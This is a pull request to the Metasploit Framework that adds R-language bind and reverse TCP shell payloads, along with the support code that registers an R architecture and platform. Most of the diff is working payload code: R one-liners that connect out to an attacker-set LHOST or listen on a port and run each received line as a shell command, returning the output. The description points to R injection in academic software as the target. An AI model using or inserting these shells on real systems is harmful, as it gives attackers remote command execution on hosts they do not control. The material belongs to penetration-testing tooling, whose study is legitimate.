### PR TITLE
Reverse and bind shells in R

### DIFF
--- a/lib/msf/core/payload/r.rb
+++ b/lib/msf/core/payload/r.rb
@@ -1,0 +1,14 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::R
+
+  def initialize(info = {})
+    super(info)
+  end
+
+  def prepends(buf)
+    buf
+  end
+
+end

--- a/lib/msf/core/payload/uuid.rb
+++ b/lib/msf/core/payload/uuid.rb
@@ -42,7 +42,8 @@ class Msf::Payload::UUID
     23 => ARCH_ZARCH,
     24 => ARCH_AARCH64,
     25 => ARCH_MIPS64,
-    26 => ARCH_PPC64LE
+    26 => ARCH_PPC64LE,
+    27 => ARCH_R
   }
 
   Platforms = {
@@ -69,7 +70,8 @@ class Msf::Payload::UUID
     20 => 'js',
     21 => 'python',
     22 => 'nodejs',
-    23 => 'firefox'
+    23 => 'firefox',
+    24 => 'r'
   }
 
   # The raw length of the UUID structure

--- a/modules/payloads/singles/cmd/unix/bind_r.rb
+++ b/modules/payloads/singles/cmd/unix/bind_r.rb
@@ -1,0 +1,48 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 516
+
+  include Msf::Payload::Single
+  include Msf::Payload::R
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Bind TCP (via R)',
+      'Description' => 'Continually listen for a connection and spawn a command shell via R',
+      'Author'      => [ 'RageLtMan' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'ruby',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return prepends(r_string)
+  end
+
+  def prepends(r_string)
+   return "R -e \"#{r_string}\""
+  end
+
+  def r_string
+    return "s<-socketConnection(port=#{datastore['LPORT']}," +
+    "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+    "(pipe(readLines(s,1))),s)}"
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_r.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_r.rb
@@ -1,0 +1,49 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 516
+
+  include Msf::Payload::Single
+  include Msf::Payload::R
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP (via R)',
+      'Description' => 'Connect back and create a command shell via R',
+      'Author'      => [ 'RageLtMan' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'r',
+      'Arch'        => ARCH_R,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'r',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return prepends(r_string)
+  end
+
+  def prepends(r_string)
+   return "R -e \"#{r_string}\""
+  end 
+
+  def r_string
+    lhost = datastore['LHOST']
+    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+    return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
+    "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
+    "(pipe(readLines(s, 1))),s)}"
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_r.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_r.rb
@@ -37,7 +37,7 @@ module MetasploitModule
 
   def prepends(r_string)
    return "R -e \"#{r_string}\""
-  end 
+  end
 
   def r_string
     lhost = datastore['LHOST']

--- a/modules/payloads/singles/r/shell_bind_tcp.rb
+++ b/modules/payloads/singles/r/shell_bind_tcp.rb
@@ -1,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 516
+
+  include Msf::Payload::Single
+  include Msf::Payload::R
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'R Command Shell, Bind TCP',
+      'Description' => 'Continually listen for a connection and spawn a command shell via R',
+      'Author'      => [ 'RageLtMan' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'r',
+      'Arch'        => ARCH_R,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'r',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return prepends(r_string)
+  end
+
+  def r_string
+    return "s<-socketConnection(port=#{datastore['LPORT']}," +
+    "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+    "(pipe(readLines(s,1))),s)}"
+  end
+end

--- a/modules/payloads/singles/r/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/r/shell_reverse_tcp.rb
@@ -1,0 +1,45 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 516
+
+  include Msf::Payload::Single
+  include Msf::Payload::R
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'R Command Shell, Reverse TCP',
+      'Description' => 'Connect back and create a command shell via R',
+      'Author'      => [ 'RageLtMan' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'r',
+      'Arch'        => ARCH_R,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'r',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return prepends(r_string)
+  end
+
+  def r_string
+    lhost = datastore['LHOST']
+    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+    return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
+    "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
+    "(pipe(readLines(s, 1))),s)}"
+  end
+end


### PR DESCRIPTION
Initial implementation of bind and reverse TCP shells in R.
Supports IPv4 and 6, provides stateless sessions which wont change
the cwd when cd is invoked since each command invocation actually
spawns a pipe to execute that specific line's invocation.

R injections are common in academic software written in a hurry by
students or lab administrators. The language runtimes are also
commonly found adjacent to valuable data, and often used by teams
which are not directly responsible for information security.

Testing:
  Local testing with netcat bind and rev handlers.

TODO:
  Add the appropriate platform/language library definitions
  More testing/external validation